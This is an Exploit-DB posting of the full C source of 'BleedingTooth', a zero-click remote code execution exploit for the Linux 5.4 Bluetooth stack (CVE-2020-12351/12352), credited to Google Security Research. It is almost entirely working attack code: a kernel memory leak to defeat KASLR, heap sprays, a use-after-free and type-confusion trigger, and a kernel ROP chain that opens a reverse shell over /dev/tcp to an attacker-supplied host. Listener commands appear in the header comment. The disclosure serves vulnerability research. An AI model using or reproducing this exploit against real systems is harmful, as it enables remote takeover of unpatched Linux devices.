Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution

EDB-ID:

49754




Platform:

Linux

Date:

2021-04-08


# Exploit Title: Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution
# Date: 06/04/2020
# Exploit Author: Google Security Research (Andy Nguyen)
# Tested on: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# CVE : CVE-2020-12351, CVE-2020-12352

/*
 * BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
 * by Andy Nguyen (theflow@)
 *
 * This Proof-Of-Concept demonstrates the exploitation of
 * CVE-2020-12351 and CVE-2020-12352.
 *
 * Compile using:
 *   $ gcc -o exploit exploit.c -lbluetooth
 *
 * and execute as:
 *   $ sudo ./exploit target_mac source_ip source_port
 *
 * In another terminal, run:
 *   $ nc -lvp 1337
 *   exec bash -i 2>&0 1>&0
 *
 * If successful, a calc can be spawned with:
 *   export XAUTHORITY=/run/user/1000/gdm/Xauthority
 *   export DISPLAY=:0
 *   gnome-calculator
 *
 * This Proof-Of-Concept has been tested against a Dell XPS 15 running
 * Ubuntu 20.04.1 LTS with:
 * - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
 *   x86_64 x86_64 x86_64 GNU/Linux
 *
 * The success rate of the exploit is estimated at 80%.
 */

#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"

// Increase if the heap spray is not reliable.
#define NUM_SPRAY_KMALLOC_1024 6
#define NUM_SPRAY_KMALLOC_128 6

// Increase if stuck at sending packets.
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000

#define KERNEL_TEXT_BASE 0xffffffff81000000

#define KERNEL_UBUNTU_5_4_0_48 1

#ifdef KERNEL_UBUNTU_5_4_0_48
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
#define POP_RAX_RET 0xffffffff8103d0b1
#define POP_RDI_RET 0xffffffff8108efa0
#define JMP_RAX 0xffffffff8100005b
#define RUN_CMD 0xffffffff810ce470
#define DO_TASK_DEAD 0xffffffff810dc260

#define KASLR_DEFEAT(kaslr_offset, kernel_addr)                                \
  do {                                                                         \
    if ((kernel_addr & 0xfffff) == 0xf4d8e)                                    \
      kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e;                 \
    else                                                                       \
      kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4;                \
  } while (0)
#else
#error "No kernel version defined"
#endif

#define L2CAP_IDENT 0x41

#define SIGNALLING_CID 0x01
#define AMP_MGR_CID 0x03

typedef struct {
  uint8_t code;
  uint8_t ident;
  uint16_t len;
} __attribute__((packed)) a2mp_hdr;
#define A2MP_HDR_SIZE 4

#define A2MP_COMMAND_REJ 0x01
typedef struct {
  uint16_t reason;
} __attribute__((packed)) a2mp_command_rej;

#define A2MP_INFO_REQ 0x06
typedef struct {
  uint8_t id;
} __attribute__((packed)) a2mp_info_req;

#define A2MP_INFO_RSP 0x07
typedef struct {
  uint8_t id;
  uint8_t status;
  uint32_t total_bw;
  uint32_t max_bw;
  uint32_t min_latency;
  uint16_t pal_caps;
  uint16_t assoc_size;
} __attribute__((packed)) a2mp_info_rsp;

#define A2MP_ASSOC_REQ 0x08
typedef struct {
  uint8_t id;
} __attribute__((packed)) a2mp_assoc_req;

#define A2MP_ASSOC_RSP 0x09
typedef struct {
  uint8_t id;
  uint8_t status;
  uint8_t assoc_data[0];
} __attribute__((packed)) a2mp_assoc_rsp;

typedef struct {
  uint8_t mode;
  uint8_t txwin_size;
  uint8_t max_transmit;
  uint16_t retrans_timeout;
  uint16_t monitor_timeout;
  uint16_t max_pdu_size;
} __attribute__((packed)) l2cap_conf_rfc;

static char remote_command[64];

static int hci_sock = 0, l2_sock = 0;
static uint16_t hci_handle = 0;

static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0;

static uint16_t crc16_tab[] = {
    0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601,
    0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0,
    0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81,
    0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941,
    0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01,
    0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0,
    0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081,
    0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
    0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00,
    0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0,
    0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981,
    0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41,
    0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700,
    0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0,
    0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281,
    0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
    0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01,
    0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1,
    0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80,
    0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541,
    0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101,
    0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0,
    0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481,
    0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
    0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801,
    0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1,
    0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581,
    0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341,
    0x4100, 0x81C1, 0x8081, 0x4040,
};

static uint16_t crc16(uint16_t crc, const void *buf, size_t size) {
  const uint8_t *p = buf;
  while (size--)
    crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8);
  return crc;
}

static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) {
  int l2_sock;

  if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
    perror("[-] socket");
    exit(1);
  }

  struct sockaddr_l2 laddr = {0};
  laddr.l2_family = AF_BLUETOOTH;
  memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));
  if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
    perror("[-] bind");
    exit(1);
  }

  struct sockaddr_l2 raddr = {0};
  raddr.l2_family = AF_BLUETOOTH;
  raddr.l2_bdaddr = dst_addr;
  if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 &&
      errno != EALREADY) {
    perror("[-] connect");
    exit(1);
  }

  struct l2cap_conninfo conninfo = {0};
  socklen_t len = sizeof(conninfo);
  if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) {
    perror("[-] getsockopt");
    exit(1);
  }

  if (handle)
    *handle = conninfo.hci_handle;

  return l2_sock;
}

static int connect_hci(void) {
  struct hci_dev_info di = {0};
  int hci_device_id = hci_get_route(NULL);
  int hci_sock = hci_open_dev(hci_device_id);
  if (hci_devinfo(hci_device_id, &di) < 0) {
    perror("[-] hci_devinfo");
    exit(1);
  }

  struct hci_filter flt = {0};
  hci_filter_clear(&flt);
  hci_filter_all_ptypes(&flt);
  hci_filter_all_events(&flt);
  if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {
    perror("[-] setsockopt(HCI_FILTER)");
    exit(1);
  }

  return hci_sock;
}

static void wait_event_complete_packet(void) {
  while (1) {
    uint8_t buf[256] = {0};
    if (read(hci_sock, buf, sizeof(buf)) < 0) {
      perror("[-] read");
      exit(1);
    }
    if (buf[0] == HCI_EVENT_PKT) {
      hci_event_hdr *hdr = (hci_event_hdr *)&buf[1];
      if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS)
        break;
    }
  }
}

static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data,
                              uint16_t data_length, uint16_t flags) {
  uint8_t type = HCI_ACLDATA_PKT;

  hci_acl_hdr hdr = {0};
  hdr.handle = htobs(acl_handle_pack(hci_handle, flags));
  hdr.dlen = data_length;

  struct iovec iv[3] = {0};
  iv[0].iov_base = &type;
  iv[0].iov_len = sizeof(type);
  iv[1].iov_base = &hdr;
  iv[1].iov_len = HCI_ACL_HDR_SIZE;
  iv[2].iov_base = data;
  iv[2].iov_len = data_length;
  if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) {
    perror("[-] writev");
    exit(1);
  }

  usleep(HCI_SEND_ACL_DATA_WAIT_USEC);
  wait_event_complete_packet();
}

static void disconnect_a2mp(void) {
  printf("[*] Disconnecting A2MP channel...\n");

  struct {
    l2cap_hdr hdr;
    l2cap_cmd_hdr cmd_hdr;
    l2cap_disconn_req disconn_req;
  } disconn_req = {0};
  disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE);
  disconn_req.hdr.cid = htobs(SIGNALLING_CID);
  disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ;
  disconn_req.cmd_hdr.ident = L2CAP_IDENT;
  disconn_req.cmd_hdr.len =
      htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
  disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID);
  disconn_req.disconn_req.scid = htobs(AMP_MGR_CID);
  hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2);
}

static void connect_a2mp(void) {
  printf("[*] Connecting A2MP channel...\n");

  struct {
    l2cap_hdr hdr;
  } a2mp_create = {0};
  a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE);
  a2mp_create.hdr.cid = htobs(AMP_MGR_CID);
  hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2);

  // Configure to L2CAP_MODE_BASIC and max MTU.
  struct {
    l2cap_hdr hdr;
    l2cap_cmd_hdr cmd_hdr;
    l2cap_conf_rsp conf_rsp;
    l2cap_conf_opt conf_opt;
    l2cap_conf_rfc conf_rfc;
    l2cap_conf_opt conf_opt2;
    uint16_t conf_mtu;
  } conf_rsp = {0};
  conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
  conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
  conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
  conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
  conf_rsp.cmd_hdr.len =
      htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
  conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
  conf_rsp.conf_rsp.flags = htobs(0);
  conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
  conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
  conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
  conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC;
  conf_rsp.conf_opt2.type = L2CAP_CONF_MTU;
  conf_rsp.conf_opt2.len = sizeof(uint16_t);
  conf_rsp.conf_mtu = htobs(0xffff);
  hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}

static void prepare_l2cap_chan_addr_leak(void) {
  printf("[*] Preparing to leak l2cap_chan address...\n");

  struct {
    l2cap_hdr hdr;
    l2cap_cmd_hdr cmd_hdr;
    l2cap_conf_rsp conf_rsp;
    l2cap_conf_opt conf_opt;
    l2cap_conf_rfc conf_rfc;
  } conf_rsp = {0};
  conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
  conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
  conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
  conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
  conf_rsp.cmd_hdr.len =
      htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
  conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
  conf_rsp.conf_rsp.flags = htobs(0);
  conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
  conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
  conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
  conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM;
  hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}

static uint64_t leak_kstack(void) {
  printf("[*] Leaking A2MP kernel stack memory...\n");

  struct {
    l2cap_hdr hdr;
    a2mp_hdr amp_hdr;
    a2mp_info_req info_req;
  } info_req = {0};
  info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE);
  info_req.hdr.cid = htobs(AMP_MGR_CID);
  info_req.amp_hdr.code = A2MP_INFO_REQ;
  info_req.amp_hdr.ident = L2CAP_IDENT;
  info_req.amp_hdr.len =
      htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
  // Use a dummy id to make hci_dev_get() fail.
  info_req.info_req.id = 0x42;
  hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2);

  while (1) {
    uint8_t buf[256] = {0};
    if (read(hci_sock, buf, sizeof(buf)) < 0) {
      perror("[-] read");
      exit(1);
    }
    if (buf[0] == HCI_ACLDATA_PKT) {
      l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5];
      if (btohs(l2_hdr->cid) == AMP_MGR_CID) {
        a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9];
        if (amp_hdr->code == A2MP_INFO_RSP)
          return *(uint64_t *)&buf[21];
      }
    }
  }

  return 0;
}

static void trigger_type_confusion(void) {
  struct {
    l2cap_hdr hdr;
    uint16_t ctrl;
    a2mp_hdr amp_hdr;
    a2mp_command_rej cmd_rej;
    uint16_t fcs;
  } cmd_rej = {0};
  cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE);
  cmd_rej.hdr.cid = htobs(AMP_MGR_CID);
  cmd_rej.ctrl = 0xffff;
  cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ;
  cmd_rej.amp_hdr.ident = L2CAP_IDENT;
  cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE -
                              sizeof(a2mp_hdr) - sizeof(uint32_t));
  cmd_rej.cmd_rej.reason = 0;
  cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t));
  hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2);
}

static void build_krop(uint64_t *rop, uint64_t cmd_addr) {
  *rop++ = kaslr_offset + POP_RAX_RET;
  *rop++ = kaslr_offset + RUN_CMD;
  *rop++ = kaslr_offset + POP_RDI_RET;
  *rop++ = cmd_addr;
  *rop++ = kaslr_offset + JMP_RAX;
  *rop++ = kaslr_offset + POP_RAX_RET;
  *rop++ = kaslr_offset + DO_TASK_DEAD;
  *rop++ = kaslr_offset + JMP_RAX;
}

static void build_payload(uint8_t data[0x400]) {
  // Fake sk_filter object starting at offset 0x300.
  *(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog

  // Fake bpf_prog object starting at offset 0x320.
  // RBX points to the amp_mgr object.
  *(uint64_t *)&data[0x350] =
      kaslr_offset +
      PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func
  *(uint64_t *)&data[0x358] = 0xDEADBEEF;                  // rbp

  // Build kernel ROP chain that executes run_cmd() from kernel/reboot.c.
  // Note that when executing the ROP chain, the data below in memory will be
  // overwritten. Therefore, the argument should be located after the ROP chain.
  build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0);
  strncpy(&data[0x3c0], remote_command, 0x40);
}

static void spray_kmalloc_1024(int num) {
  // Skip first two hci devices because they may be legit.
  for (int i = 2; i < num + 2; i++) {
    printf("\r[*] Sending packet with id #%d...", i);
    fflush(stdout);

    struct {
      l2cap_hdr hdr;
      a2mp_hdr amp_hdr;
      a2mp_info_rsp info_rsp;
    } info_rsp = {0};
    info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
    info_rsp.hdr.cid = htobs(AMP_MGR_CID);
    info_rsp.amp_hdr.code = A2MP_INFO_RSP;
    info_rsp.amp_hdr.ident = L2CAP_IDENT;
    info_rsp.amp_hdr.len =
        htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
    info_rsp.info_rsp.id = i;
    hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);

    struct {
      l2cap_hdr hdr;
      a2mp_hdr amp_hdr;
      a2mp_assoc_rsp assoc_rsp;
      uint8_t data[0x400];
    } assoc_rsp = {0};
    assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
    assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
    assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
    assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
    assoc_rsp.amp_hdr.len =
        htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
    assoc_rsp.assoc_rsp.id = i;
    for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
      memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
    build_payload(assoc_rsp.data);

    // Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes).
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp,
                      sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2);
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1);
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1);
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1);
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1);
  }

  printf("\n");
}

static void spray_kmalloc_128(int num) {
  // Skip first two hci devices because they may be legit.
  for (int i = 2; i < num + 2; i++) {
    printf("\r[*] Sending packet with id #%d...", i);
    fflush(stdout);

    struct {
      l2cap_hdr hdr;
      a2mp_hdr amp_hdr;
      a2mp_info_rsp info_rsp;
    } info_rsp = {0};
    info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
    info_rsp.hdr.cid = htobs(AMP_MGR_CID);
    info_rsp.amp_hdr.code = A2MP_INFO_RSP;
    info_rsp.amp_hdr.ident = L2CAP_IDENT;
    info_rsp.amp_hdr.len =
        htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
    info_rsp.info_rsp.id = i;
    hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);

    struct {
      l2cap_hdr hdr;
      a2mp_hdr amp_hdr;
      a2mp_assoc_rsp assoc_rsp;
      uint8_t data[0x80];
    } assoc_rsp = {0};
    assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
    assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
    assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
    assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
    assoc_rsp.amp_hdr.len =
        htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
    assoc_rsp.assoc_rsp.id = i;
    for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
      memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
    // Fake sock object.
    *(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter
    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2);
  }

  printf("\n");
}

int main(int argc, char *argv[]) {
  if (argc != 4) {
    printf("Usage: %s target_mac source_ip source_port\n", argv[0]);
    exit(1);
  }

  bdaddr_t dst_addr = {0};
  str2ba(argv[1], &dst_addr);

  snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2],
           argv[3]);
  printf("[+] Remote command: %s\n", remote_command);

  printf("[*] Opening hci device...\n");
  hci_sock = connect_hci();

  printf("[*] Connecting to victim...\n");
  l2_sock = connect_l2cap(dst_addr, &hci_handle);
  printf("[+] HCI handle: %x\n", hci_handle);

  connect_a2mp();

  uint64_t kernel_addr = leak_kstack();
  printf("[+] Kernel address: %lx\n", kernel_addr);
  KASLR_DEFEAT(kaslr_offset, kernel_addr);
  printf("[+] KASLR offset: %lx\n", kaslr_offset);
  if ((kaslr_offset & 0xfffff) != 0) {
    printf("[-] Error KASLR offset is invalid.\n");
    exit(1);
  }

  prepare_l2cap_chan_addr_leak();
  l2cap_chan_addr = leak_kstack() - 0x110;
  printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr);
  if ((l2cap_chan_addr & 0xff) != 0) {
    printf("[-] Error l2cap_chan address is invalid.\n");
    exit(1);
  }

  // Somehow, spraying a bit before makes the UaF more reliable.
  printf("[*] Spraying kmalloc-1024...\n");
  spray_kmalloc_1024(0x40);

  // Disconnect to free the l2cap_chan object, then reconnect.
  disconnect_a2mp();
  connect_a2mp();

  // Attempt to reclaim the freed l2cap_chan object.
  printf("[*] Spraying kmalloc-1024...\n");
  for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) {
    spray_kmalloc_1024(0x40);
  }

  // Attempt to control the out-of-bounds read.
  printf("[*] Spraying kmalloc-128...\n");
  for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) {
    spray_kmalloc_128(0x40);
  }

  printf("[*] Triggering remote code execution...\n");
  disconnect_a2mp();
  trigger_type_confusion();

  close(l2_sock);
  hci_close_dev(hci_sock);

  return 0;
}